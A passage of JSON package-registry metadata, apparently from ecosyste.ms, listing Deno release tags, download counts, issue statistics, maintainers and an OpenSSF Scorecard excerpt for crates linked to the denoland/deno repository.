ithub.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-30T10:02:25.307Z","dependent_packages_count":0,"downloads":310,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":92.09699146834306,"dependent_repos_count":29.318292202377133,"dependent_packages_count":33.81230354737315,"stargazers_count":0.026575515702464195,"forks_count":0.08980691513246519,"average":31.068793929785652},"purl":"pkg:cargo/libpacstall-rs","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/libpacstall-rs","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/libpacstall-rs","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/libpacstall-rs/dependencies","status":"removed","funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T03:37:30.716Z","issues_count":6632,"pull_requests_count":9650,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":582,"issue_authors_count":2478,"avg_comments_per_issue":2.5061821471652594,"avg_comments_per_pull_request":0.7196891191709844,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1201,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":185,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2354694485842026,"past_year_avg_comments_per_pull_request":1.11240632805995,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/libpacstall-rs/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/libpacstall-rs/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/libpacstall-rs/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/libpacstall-rs/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/libpacstall-rs/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/libpacstall-rs/codemeta","maintainers":[{"uuid":"193057","login":"TylerJerme","name":null,"email":null,"url":"https://github.com/TylerJerme","packages_count":4,"html_url":"https://crates.io/users/TylerJerme","role":null,"created_at":"2023-01-11T08:26:50.711Z","updated_at":"2023-01-11T08:26:50.711Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/TylerJerme/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":13674639,"name":"deno_node_sqlite","ecosystem":"cargo","description":"Node sqlite compatibility for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":28,"first_release_published_at":"2026-02-12T15:06:13.179Z","latest_release_published_at":"2026-08-27T15:21:12.641Z","latest_release_number":"0.28.0","last_synced_at":"2026-09-07T22:55:12.398Z","created_at":"2026-02-12T15:17:52.072Z","updated_at":"2026-09-08T07:07:47.997Z","registry_url":"https://crates.io/crates/deno_node_sqlite/","install_command":"cargo install deno_node_sqlite","documentation_url":"https://docs.rs/deno_node_sqlite/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no 